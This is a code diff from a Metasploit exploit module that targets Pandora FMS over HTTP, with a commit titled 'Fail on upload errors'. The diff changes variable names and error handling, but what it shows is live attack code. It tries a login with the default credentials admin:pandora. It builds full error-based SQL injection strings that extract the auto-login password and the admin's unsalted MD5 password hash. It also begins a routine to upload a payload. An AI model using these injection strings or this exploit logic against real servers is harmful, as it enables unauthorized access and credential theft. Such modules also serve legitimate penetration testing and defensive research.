Fail on upload errors

Author: jvazquez-r7

modules/exploits/linux/http/pandora_fms_sqli.rb

@@ -86,9 +86,8 @@ def check
   end
 
 
+  # Attempt to login with credentials (default admin:pandora)
   def authenticate
-
-    # Attempt to login with default credentials (admin:pandora)
     res = send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(uri, 'index.php'),
@@ -105,17 +104,17 @@ def authenticate
     return auth_succeeded?(res)
   end
 
+  # Attempt to login with auto login and SQLi
   def login_hash
-    # Generate random string and convert to hex
-    sqlq = rand_text_alpha(8)
-    sqls = sqlq.each_byte.map { |b| b.to_s(16) }.join
+    clue = rand_text_alpha(8)
+    sql_clue = clue.each_byte.map { |b| b.to_s(16) }.join
     # select value from tconfig where token = 'loginhash_pwd';
-    sqli = "1' AND (SELECT 2243 FROM(SELECT COUNT(*),CONCAT(0x#{sqls},(SELECT MID((IFNULL(CAST"
+    sqli = "1' AND (SELECT 2243 FROM(SELECT COUNT(*),CONCAT(0x#{sql_clue},(SELECT MID((IFNULL(CAST"
     sqli << "(value AS CHAR),0x20)),1,50) FROM tconfig WHERE token = 0x6c6f67696e686173685f707764 "
-    sqli << "LIMIT 0,1),0x#{sqls},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP "
+    sqli << "LIMIT 0,1),0x#{sql_clue},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP "
     sqli << "BY x)a) AND 'msf'='msf"
 
-    password = inject_sql(sqli, sqlq)
+    password = inject_sql(sqli, clue)
 
     if password && password.length != 0
       print_status("#{peer} - Extracted auto login password (#{password})")
@@ -163,15 +162,16 @@ def auth_succeeded?(res)
 
   def extract
     # Generate random string and convert to hex
-    sqlq = rand_text_alpha(8)
-    sqls = sqlq.each_byte.map { |b| b.to_s(16) }.join
+    clue = rand_text_alpha(8)
+    hex_clue = clue.each_byte.map { |b| b.to_s(16) }.join
+
     # select password from tusuario where id_user = 0;
-    sqli = "test' AND (SELECT 5612 FROM(SELECT COUNT(*),CONCAT(0x#{sqls},(SELECT MID((IFNULL"
+    sqli = "test' AND (SELECT 5612 FROM(SELECT COUNT(*),CONCAT(0x#{hex_clue},(SELECT MID((IFNULL"
     sqli << "(CAST(password AS CHAR),0x20)),1,50) FROM tusuario WHERE id_user = 0 LIMIT 0,1)"
-    sqli << ",0x#{sqls},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY "
+    sqli << ",0x#{hex_clue},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY "
     sqli << "x)a) AND 'msf'='msf"
 
-    password = inject_sql(sqli, sqlq)
+    password = inject_sql(sqli, clue)
 
     if password && password.length != 0
       print_good("#{peer} - Extracted admin password hash, unsalted md5 - [ #{password} ]")
@@ -227,29 +227,27 @@ def upload
         hash = $1
       else
         print_error("#{peer} - Could not extract hash from response!")
-        print_error("#{peer} - Upload will fail!")
-        return false
+        fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!")
       end
 
       # Extract hash2
       if form =~ /(?<=name="hash2" type="hidden"  value=")(.*?)(?=" \/>)/
         hash2 = $1
       else
         print_error("#{peer} - Could not extract hash2 from response!")
-        print_error("#{peer} - Upload will fail!")
-        return false
+        fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!")
       end
 
       # Extract real_directory
       if form =~ /(?<=name="real_directory" type="hidden"  value=")(.*?)(" \/>)/
         real_directory = $1
       else
         print_error("#{peer} - Could not extract real_directory from response!")
-        print_error("#{peer} - Upload will fail!")
-        return false
+        fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!")
       end
     else
       print_error("#{peer} - Could not identify upload form!")
+      fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!")
     end